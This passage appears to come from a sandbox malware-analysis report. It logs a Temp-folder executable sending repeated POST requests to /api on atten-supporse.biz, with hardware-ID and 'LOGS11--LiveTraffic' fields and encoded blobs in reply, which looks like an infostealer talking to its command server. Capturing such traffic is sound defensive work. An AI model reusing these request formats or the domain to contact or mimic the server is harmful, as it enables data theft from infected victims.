{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc36c8838c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=759&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1440552&cwnd=196&unsent_bytes=0&cid=61c9e67f5b08d2f1&ts=738&x=0"
2024-12-09 23:43:56 UTC	214	IN	Data Raw: 64 30 0d 0a 2b 73 6e 43 65 71 67 47 6d 4b 65 51 6e 42 74 45 4e 6d 49 63 31 67 78 41 44 52 72 7a 4b 57 32 52 37 76 55 46 6f 51 42 75 4d 4d 65 68 73 75 41 50 69 6a 79 36 7a 2b 54 6f 61 33 35 71 54 55 44 35 50 58 67 34 4e 4d 45 59 57 4c 2f 66 78 44 61 50 4d 56 68 73 36 4a 57 76 70 43 61 48 59 76 33 42 76 76 6c 6a 49 52 52 4f 50 72 42 34 59 6a 63 71 33 77 73 49 73 39 54 45 65 49 31 37 54 45 58 6c 77 4f 75 71 44 74 78 32 6f 76 75 2f 77 44 52 31 44 6c 63 79 35 44 31 31 49 79 76 43 47 6b 4f 67 32 4b 6b 71 30 6e 51 4c 55 61 71 6d 35 72 41 62 78 6d 4c 33 79 72 37 35 59 79 45 55 54 6a 36 77 65 47 49 33 4b 74 38 4c 43 4c 50 55 78 58 6a 38 0d 0a Data Ascii: d0+snCeqgGmKeQnBtENmIc1gxADRrzKW2R7vUFoQBuMMehsuAPijy6z+Toa35qTUD5PXg4NMEYWL/fxDaPMVhs6JWvpCaHYv3BvvljIRROPrB4Yjcq3wsIs9TEeI17TEXlwOuqDtx2ovu/wDR1Dlcy5D11IyvCGkOg2Kkq0nQLUaqm5rAbxmL3yr75YyEUTj6weGI3Kt8LCLPUxXj8
2024-12-09 23:43:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49920	104.21.80.1	443	4600	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:55 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TA8OEBFKKQ2CTQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20419 Host: atten-supporse.biz
2024-12-09 23:43:55 UTC	15331	OUT	Data Raw: 2d 2d 54 41 38 4f 45 42 46 4b 4b 51 32 43 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 54 41 38 4f 45 42 46 4b 4b 51 32 43 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 41 38 4f 45 42 46 4b 4b 51 32 43 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 54 41 Data Ascii: --TA8OEBFKKQ2CTQContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--TA8OEBFKKQ2CTQContent-Disposition: form-data; name="pid"3--TA8OEBFKKQ2CTQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--TA
2024-12-09 23:43:55 UTC	5088	OUT	Data Raw: 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ?lrQMn 64F6(X&7~`aO
2024-12-09 23:43:56 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jngiqg1ndjt0vb9iodnlkbbeji; expires=Fri, 04-Apr-2025 17:30:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8wYB7VaQs55ze4dky80KjUyaSfFNvu0vr3gvpFZWRM1hc9O5kws6iS%2Fw5Rn8DFLU%2B%2FFiVYasai80nTL1IeyRlHn0elHloXKnmGxJPQ0CAX0Mme5ywaMkxlVYazq0JvZ%2B7dnaNo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc37ce6743df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1596&rtt_var=817&sent=19&recv=27&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21379&delivery_rate=1829573&cwnd=243&unsent_bytes=0&cid=09d317bc69eeab0c&ts=958&x=0"
2024-12-09 23:43:56 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:43:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49928	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:57 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-09 23:43:57 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-09 23:43:58 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9pdoqacb4o5i6hsbq9rmf93h16; expires=Fri, 04-Apr-2025 17:30:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2FY4WNeGV4YUrXDBJox5XcKo6uz3HH1I5M%2FgQHdHV6Tq9miPRhOjOOHVMur0sbJKVvz3cgyhcFNIaeWAtng2ukSrnb0E8KtBczQuv%2FBWt4SlNSs7ntzpGSDCQfOwqyVjRtX2FaU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc4388fc8c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1961&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=955&delivery_rate=1456359&cwnd=196&unsent_bytes=0&cid=5e3058aa978a64b4&ts=753&x=0"
2024-12-09 23:43:58 UTC	354	IN	Data Raw: 34 39 31 63 0d 0a 56 75 63 5a 46 4d 77 4b 37 62 42 76 46 58 50 68 5a 33 71 2f 4a 50 4e 49 66 44 64 6c 36 4a 58 63 36 4c 2b 4f 54 44 47 43 66 73 45 74 78 57 38 32 39 6a 37 42 6b 68 78 77 55 64 73 54 43 4d 70 42 33 32 6f 64 55 30 66 53 38 37 32 45 7a 4f 74 67 45 2f 51 54 34 32 79 42 65 48 69 2f 62 38 47 53 43 6d 31 52 32 7a 77 42 6e 55 47 64 61 6b 59 56 41 49 4c 33 76 59 54 64 37 79 64 65 38 68 4b 69 50 6f 74 2b 66 4b 6c 70 69 64 45 44 65 42 61 45 41 68 76 56 53 70 6f 6c 46 46 70 48 78 4c 65 35 6b 70 32 30 62 6e 7a 6e 43 71 41 62 68 6d 70 2f 37 6e 66 42 79 30 31 77 48 63 4e 64 57 4e 35 42 6b 53 51 61 55 77 36 41 2f 62 53 4d 33 4f 6f 6d 51 65 73 59 71 54 36 46 66 58 32 6a 59 4a 33 63 43 58 38 64 67 67 67 62 6e 51 6a 52 4c 51 59 56 58 38 71 6b 6a 49 6e 4d 2f Data Ascii: 491cVucZFMwK7bBvFXPhZ3q/JPNIfDdl6JXc6L+OTDGCfsEtxW829j7BkhxwUdsTCMpB32odU0fS872EzOtgE/QT42yBeHi/b8GSCm1R2zwBnUGdakYVAIL3vYTd7yde8hKiPot+fKlpidEDeBaEAhvVSpolFFpHxLe5kp20bnznCqAbhmp/7nfBy01wHcNdWN5BkSQaUw6A/bSM3OomQesYqT6FfX2jYJ3cCX8dgggbnQjRLQYVX8qkjInM/
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 5a 59 2f 41 42 58 77 61 68 68 63 54 31 45 75 63 4b 68 4e 66 43 49 6e 33 75 59 44 58 34 79 52 58 37 52 47 6c 4e 49 55 37 4f 4f 35 76 6c 35 4a 56 4e 7a 4b 47 46 52 2f 52 55 4e 4d 51 58 6b 70 4a 6b 37 65 35 68 70 32 30 62 6c 76 6c 48 36 41 2f 69 6e 68 2b 70 58 71 50 77 41 74 36 46 4a 45 44 48 64 4e 4d 6b 6a 67 55 57 77 47 4a 2f 72 57 44 32 4f 73 71 45 36 35 63 70 43 7a 46 49 7a 61 50 5a 59 54 65 42 32 41 52 77 78 70 57 78 41 61 57 4a 6c 34 4e 52 34 37 32 75 6f 76 5a 34 69 42 58 37 42 71 74 4f 59 70 39 66 4b 35 76 68 64 6f 46 64 68 79 49 43 68 6a 59 53 35 55 73 45 6c 51 43 79 72 6e 2b 6a 63 57 73 64 68 50 4f 47 36 41 6d 78 30 35 31 6f 47 61 49 78 45 31 6f 58 35 70 46 48 39 45 47 79 57 6f 51 55 41 69 59 39 71 79 50 30 2f 34 69 56 75 59 52 6f 44 71 46 66 6e 47 Data Ascii: ZY/ABXwahhcT1EucKhNfCIn3uYDX4yRX7RGlNIU7OO5vl5JVNzKGFR/RUNMQXkpJk7e5hp20blvlH6A/inh+pXqPwAt6FJEDHdNMkjgUWwGJ/rWD2OsqE65cpCzFIzaPZYTeB2ARwxpWxAaWJl4NR472uovZ4iBX7BqtOYp9fK5vhdoFdhyIChjYS5UsElQCyrn+jcWsdhPOG6Amx051oGaIxE1oX5pFH9EGyWoQUAiY9qyP0/4iVuYRoDqFfnG
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 45 31 6f 58 35 70 46 48 39 45 47 79 57 6f 54 58 51 4b 50 2b 4c 2b 41 30 2b 6b 6b 58 2b 67 53 6f 43 61 4b 66 33 61 69 59 49 58 66 41 33 4d 5a 69 67 34 54 32 30 61 51 49 46 34 62 52 34 33 76 2f 74 4b 64 32 43 6c 66 37 52 50 68 41 59 5a 31 65 4b 6c 2b 7a 38 31 44 62 6c 47 45 43 56 69 46 42 70 30 6a 48 6c 34 4e 6a 76 65 35 68 39 6a 76 4b 56 44 74 47 36 6b 36 67 6e 39 36 70 32 57 4a 30 67 70 7a 46 4a 45 41 45 64 46 4b 30 57 52 65 55 68 2f 4b 72 2f 36 6c 32 76 6f 74 66 4f 4d 4e 71 6e 53 61 4e 57 2f 75 62 34 4f 53 56 54 63 57 68 67 30 54 32 30 36 52 4f 42 74 62 44 49 76 39 75 49 76 51 34 43 68 54 34 52 79 6c 4f 49 56 38 63 62 78 36 69 74 51 66 66 56 48 4e 52 52 2f 46 42 73 6c 71 4b 45 55 51 6d 2b 48 38 76 39 37 69 49 46 54 32 58 4c 78 36 6e 44 74 78 6f 69 6a 58 Data Ascii: E1oX5pFH9EGyWoTXQKP+L+A0+kkX+gSoCaKf3aiYIXfA3MZig4T20aQIF4bR43v/tKd2Clf7RPhAYZ1eKl+z81DblGECViFBp0jHl4Njve5h9jvKVDtG6k6gn96p2WJ0gpzFJEAEdFK0WReUh/Kr/6l2votfOMNqnSaNW/ub4OSVTcWhg0T206ROBtbDIv9uIvQ4ChT4RylOIV8cbx6itQffVHNRR/FBslqKEUQm+H8v97iIFT2XLx6nDtxoijX
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 79 49 43 68 50 50 52 70 77 75 45 6c 45 50 67 66 33 2b 78 4a 33 72 4e 68 4f 34 58 4a 59 35 69 6e 74 31 75 43 69 51 6e 42 51 33 46 6f 39 46 51 4a 31 4b 6e 79 6f 52 57 51 75 42 2f 37 2b 47 30 2b 73 72 57 75 67 55 73 54 57 42 63 33 65 67 5a 34 37 57 43 48 49 56 68 41 45 65 30 67 62 66 61 68 6c 4e 52 39 4b 33 6b 61 33 6f 72 67 39 70 6f 41 50 74 4c 63 56 38 65 75 34 77 7a 39 34 4f 65 78 6d 4d 41 78 48 52 54 4a 67 68 45 6c 34 44 68 76 36 37 6a 4e 7a 70 4b 31 4c 6b 45 4b 6b 79 68 6e 68 35 6f 57 65 48 6b 6b 4d 33 46 70 74 46 51 4a 31 6a 68 69 45 51 55 30 65 56 75 61 66 4b 32 75 42 75 43 36 41 51 71 6a 4b 44 66 6e 71 76 62 6f 66 58 42 58 4d 51 68 51 4d 62 30 6b 4b 55 4b 78 46 52 43 34 54 39 76 34 76 52 35 79 46 59 35 56 7a 74 64 49 4a 6a 4e 76 59 6f 76 74 45 62 59 Data Ascii: yIChPPRpwuElEPgf3+xJ3rNhO4XJY5int1uCiQnBQ3Fo9FQJ1KnyoRWQuB/7+G0+srWugUsTWBc3egZ47WCHIVhAEe0gbfahlNR9K3ka3org9poAPtLcV8eu4wz94OexmMAxHRTJghEl4Dhv67jNzpK1LkEKkyhnh5oWeHkkM3FptFQJ1jhiEQU0eVuafK2uBuC6AQqjKDfnqvbofXBXMQhQMb0kKUKxFRC4T9v4vR5yFY5VztdIJjNvYovtEbY
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 55 6e 51 6a 52 4c 51 59 56 58 38 72 5a 74 5a 6e 4b 37 79 42 59 39 67 66 6a 4b 38 74 69 4e 71 6c 6b 7a 34 70 4e 64 42 71 49 41 52 6a 52 52 70 55 6e 48 6b 63 49 6a 66 43 33 67 63 2f 6d 4b 56 54 72 46 4b 67 37 67 32 6c 36 6f 48 71 4b 77 42 38 33 58 38 4d 43 41 4a 30 65 30 52 77 5a 52 52 65 4a 74 59 2b 63 33 76 6f 6c 58 75 78 63 76 48 71 63 4f 33 47 69 4b 4e 65 53 43 33 67 59 67 41 6f 5a 31 45 71 63 4c 78 64 51 42 6f 7a 7a 74 49 44 64 36 69 68 53 35 52 61 67 4e 59 39 79 63 61 5a 76 6a 4d 42 4e 4f 56 47 45 48 56 69 46 42 72 67 74 44 46 73 58 79 75 6a 77 6b 35 33 72 49 68 4f 34 58 4b 63 2b 69 6e 39 78 6f 6d 36 4b 31 41 42 32 48 6f 49 46 46 39 6c 4e 6d 43 77 66 57 41 4b 48 38 36 79 41 31 75 4d 69 57 75 77 52 34 33 72 46 66 47 37 75 4d 4d 2f 6a 41 48 6b 66 68 42 Data Ascii: UnQjRLQYVX8rZtZnK7yBY9gfjK8tiNqlkz4pNdBqIARjRRpUnHkcIjfC3gc/mKVTrFKg7g2l6oHqKwB83X8MCAJ0e0RwZRReJtY+c3volXuxcvHqcO3GiKNeSC3gYgAoZ1EqcLxdQBozztIDd6ihS5RagNY9ycaZvjMBNOVGEHViFBrgtDFsXyujwk53rIhO4XKc+in9xom6K1AB2HoIFF9lNmCwfWAKH86yA1uMiWuwR43rFfG7uMM/jAHkfhB
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 6c 43 63 54 57 41 53 4d 38 62 57 47 7a 2b 55 75 55 4f 74 63 37 58 53 43 59 7a 62 32 4b 4b 7a 46 47 33 30 57 6a 78 4d 54 33 45 57 48 4a 77 34 56 53 63 72 6d 75 5a 75 64 74 44 68 44 39 78 75 38 65 70 77 37 63 61 49 6f 31 35 49 4c 66 68 65 45 41 78 62 50 51 35 63 6c 45 56 77 4f 6a 76 2b 39 69 74 6e 6f 4b 56 62 6a 45 4b 67 7a 68 6e 52 79 70 32 61 47 33 55 30 35 55 59 51 64 57 49 55 47 73 44 45 64 57 51 72 4b 36 50 43 54 6e 65 73 69 45 37 68 63 72 7a 71 41 65 33 79 6f 62 49 72 55 42 33 49 52 69 41 59 58 32 55 43 56 4a 52 35 65 44 6f 76 78 75 34 44 57 36 69 4e 51 35 68 72 6a 65 73 56 38 62 75 34 77 7a 2f 49 57 65 68 32 45 52 51 65 54 58 39 45 74 45 68 56 66 79 76 79 79 6a 74 72 73 49 31 44 6f 47 61 63 2b 67 48 74 2b 76 47 43 50 31 52 39 6c 45 59 6f 41 46 4e 35 Data Ascii: lCcTWASM8bWGz+UuUOtc7XSCYzb2KKzFG30WjxMT3EWHJw4VScrmuZudtDhD9xu8epw7caIo15ILfheEAxbPQ5clEVwOjv+9itnoKVbjEKgzhnRyp2aG3U05UYQdWIUGsDEdWQrK6PCTnesiE7hcrzqAe3yobIrUB3IRiAYX2UCVJR5eDovxu4DW6iNQ5hrjesV8bu4wz/IWeh2ERQeTX9EtEhVfyvyyjtrsI1DoGac+gHt+vGCP1R9lEYoAFN5
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 46 59 58 69 66 69 76 74 4a 32 30 4e 32 32 67 46 37 55 7a 6c 58 68 67 70 57 57 44 77 7a 4d 33 53 64 64 58 53 6f 38 55 77 7a 56 65 53 6a 6a 45 74 37 2f 4b 68 64 55 33 45 2f 5a 63 2b 32 62 4c 4f 32 54 75 4d 4d 2b 56 44 6d 55 44 68 51 59 4f 33 67 47 76 46 44 6c 44 44 59 33 6e 75 5a 33 53 72 47 41 54 37 31 7a 37 44 63 56 79 63 62 56 35 6d 64 38 64 63 46 47 38 53 31 6a 46 42 73 6c 71 4b 31 59 4a 68 50 43 6f 6d 35 44 4c 4f 46 6e 6e 44 4b 51 6a 69 6a 73 34 37 6d 37 50 69 6c 34 35 55 59 63 55 57 49 55 57 77 33 46 4c 42 6c 44 61 70 61 48 45 78 4b 77 34 45 37 68 4f 37 58 53 58 4f 79 37 75 4c 34 7a 41 48 33 45 53 6c 51 5a 66 34 33 69 32 4d 42 4e 54 45 4a 76 4a 67 49 33 48 34 53 68 45 38 56 43 32 4e 34 74 31 63 62 67 6f 77 5a 49 43 4e 30 6d 36 52 56 43 64 65 64 39 71 Data Ascii: FYXifivtJ20N22gF7UzlXhgpWWDwzM3SddXSo8UwzVeSjjEt7/KhdU3E/Zc+2bLO2TuMM+VDmUDhQYO3gGvFDlDDY3nuZ3SrGAT71z7DcVycbV5md8dcFG8S1jFBslqK1YJhPCom5DLOFnnDKQjijs47m7Pil45UYcUWIUWw3FLBlDapaHExKw4E7hO7XSXOy7uL4zAH3ESlQZf43i2MBNTEJvJgI3H4ShE8VC2N4t1cbgowZICN0m6RVCded9q
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 2b 6b 36 64 71 50 38 32 42 4b 6f 41 72 6a 62 4e 63 31 4e 72 77 6f 31 35 4a 4b 64 41 4f 52 41 78 76 4c 52 64 59 55 49 48 49 4a 6a 66 61 6f 6d 73 72 6a 45 47 33 31 48 36 30 36 67 6d 31 6e 37 69 62 50 33 55 30 76 4b 4d 4e 4e 57 4f 49 49 30 54 4a 65 44 55 65 2f 39 4c 43 45 32 76 6f 2f 48 73 63 53 70 44 57 54 61 32 47 68 4b 4d 47 53 43 7a 64 4a 30 55 74 59 32 56 66 52 63 6b 34 48 58 4e 2b 6b 36 64 71 50 38 32 42 4b 6f 41 72 6a 62 4e 63 31 4e 72 77 6f 31 35 4a 4b 64 41 4f 52 41 78 76 4c 52 64 59 55 49 48 49 4a 6a 66 61 6f 6d 73 72 6a 59 58 33 57 50 5a 30 4b 6b 48 68 34 6f 47 2b 5a 77 30 30 35 55 59 78 46 51 4f 51 47 32 57 6f 68 47 30 65 53 74 2b 62 4b 36 4f 38 67 58 65 63 4b 73 6e 6d 69 64 58 47 76 66 70 2f 46 41 6a 67 2f 74 53 52 59 6b 77 61 58 61 6b 59 48 53 Data Ascii: +k6dqP82BKoArjbNc1Nrwo15JKdAORAxvLRdYUIHIJjfaomsrjEG31H606gm1n7ibP3U0vKMNNWOII0TJeDUe/9LCE2vo/HscSpDWTa2GhKMGSCzdJ0UtY2VfRck4HXN+k6dqP82BKoArjbNc1Nrwo15JKdAORAxvLRdYUIHIJjfaomsrjYX3WPZ0KkHh4oG+Zw005UYxFQOQG2WohG0eSt+bK6O8gXecKsnmidXGvfp/FAjg/tSRYkwaXakYHS
2024-12-09 23:43:58 UTC	1369	IN	Data Raw: 59 32 76 77 74 45 64 45 4b 6f 44 53 4c 66 44 62 67 4b 4a 65 53 56 54 63 38 6b 51 49 49 33 67 62 66 61 68 49 56 58 38 72 36 72 49 33 4e 37 32 4a 55 2b 68 76 6a 4b 38 74 69 4e 72 67 6f 31 34 46 44 4e 77 50 44 58 56 69 61 53 4a 77 72 48 56 73 45 6d 4f 57 34 69 63 76 76 61 57 33 65 4d 62 45 7a 6c 58 67 30 6e 32 57 4c 78 42 68 30 41 59 51 37 4a 76 42 55 6c 6a 6f 64 46 79 75 4e 2b 72 4b 30 34 39 73 2f 56 50 42 65 68 54 65 54 65 44 62 67 4b 4a 65 53 56 54 63 38 6b 51 49 49 33 67 53 39 4c 52 4e 5a 52 35 57 35 70 38 72 4c 72 48 59 41 72 6c 79 78 64 4e 30 37 4d 61 31 36 6e 64 51 4f 59 52 4c 45 4f 79 62 77 56 4a 59 36 48 52 63 32 68 2f 4f 6f 6e 39 37 38 4b 57 33 65 4d 62 45 7a 6c 58 67 30 69 31 4c 4e 34 78 74 30 45 59 30 43 57 4a 4d 47 69 57 70 47 46 53 71 59 38 4b Data Ascii: Y2vwtEdEKoDSLfDbgKJeSVTc8kQII3gbfahIVX8r6rI3N72JU+hvjK8tiNrgo14FDNwPDXViaSJwrHVsEmOW4icvvaW3eMbEzlXg0n2WLxBh0AYQ7JvBUljodFyuN+rK049s/VPBehTeTeDbgKJeSVTc8kQII3gS9LRNZR5W5p8rLrHYArlyxdN07Ma16ndQOYRLEOybwVJY6HRc2h/Oon978KW3eMbEzlXg0i1LN4xt0EY0CWJMGiWpGFSqY8K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49933	104.21.80.1	443	4600	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:00 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E7GSUEWK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1251 Host: atten-supporse.biz
2024-12-09 23:44:00 UTC	1251	OUT	Data Raw: 2d 2d 45 37 47 53 55 45 57 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 45 37 47 53 55 45 57 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 37 47 53 55 45 57 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 37 47 53 55 45 57 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --E7GSUEWKContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--E7GSUEWKContent-Disposition: form-data; name="pid"1--E7GSUEWKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--E7GSUEWKContent-Di
2024-12-09 23:44:01 UTC	1019	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ci4p1voqj5ov7hn31ev2p9v872; expires=Fri, 04-Apr-2025 17:30:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rXw%2FpOoZHZhnuFj3IHmtgtiFJ5qT0tnREkCHyyUbPi2vX6ttYVliPXoCIvB4dBCWsZ8nueJItkh%2BEHnReW7JyQ0v1nAny5V2CRP%2BKx4KIfqZuAqB%2F2qldcROxTA4ZXwLIBc6eHw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc52490dc3f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1468&rtt_var=559&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2160&delivery_rate=1940199&cwnd=160&unsent_bytes=0&cid=8f2abeaeef1ad6f9&ts=1123&x=0"
2024-12-09 23:44:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:44:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49936	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:00 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DVYM5QCPZK6ZJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18139 Host: atten-supporse.biz
2024-12-09 23:44:00 UTC	15331	OUT	Data Raw: 2d 2d 44 56 59 4d 35 51 43 50 5a 4b 36 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 44 56 59 4d 35 51 43 50 5a 4b 36 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 56 59 4d 35 51 43 50 5a 4b 36 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 